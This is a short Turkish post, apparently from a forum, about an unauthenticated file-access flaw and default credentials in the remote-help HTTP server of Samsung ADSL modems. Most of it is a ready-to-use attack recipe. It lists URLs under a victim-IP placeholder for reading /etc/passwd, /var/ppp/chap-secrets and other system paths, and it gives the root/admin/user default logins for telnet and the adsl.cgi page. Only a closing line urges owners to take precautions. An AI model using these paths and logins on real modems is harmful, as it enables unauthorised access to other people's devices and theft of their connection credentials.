Samsung ADSL modemlerde uzaktan yardım için kullanılan HTTPd sistemindeki acık yardımıyla bu ürünün kullanıcılarına uzaktan izinsiz giriş yapılabilmektedir...
Bu iznsiz giriş modemin varsayılan şifresini kullanılarak yapılmakta olup, kurban bilgisayar hakkında detaylı bilgi alımı sağlamaktadır...
Bu acık urun marka ve modele baglı olarak diger urunlerdede gorulebileceğide acıgı bulan kişi tarafından belirtilmiştir...
örnek URL ler;
++ http://modemKullanicisininIPsi/etc/passwd
++ http://modemKullanicisininIPsi/etc/hosts
++ http://modemKullanicisininIPsi/bin/
++ http://modemKullanicisininIPsi/dev/
++ http://modemKullanicisininIPsi/lib/
++ http://modemKullanicisininIPsi/tmp/
++ http://modemKullanicisininIPsi/var/ppp/chap-secrets
++ http://modemKullanicisininIPsi/bin/sh
adreslerinden kurban bilgisayarın önemli dosyalarına ulasabilirsiniz...
Sisteme kullanıcı adı ve şifresiyle telnet ile girebileceğiniz gibi http://modemKullanicisininIPsi/cgi-bin/adsl.cgi adresinden
k.adı: root //// admin ///// user
şifre: root \\\\ admin \\\\ user
bilgilerini kullanarak girebilirsiniz...
Benden tavsiye bir an önce tedbirinizi alın...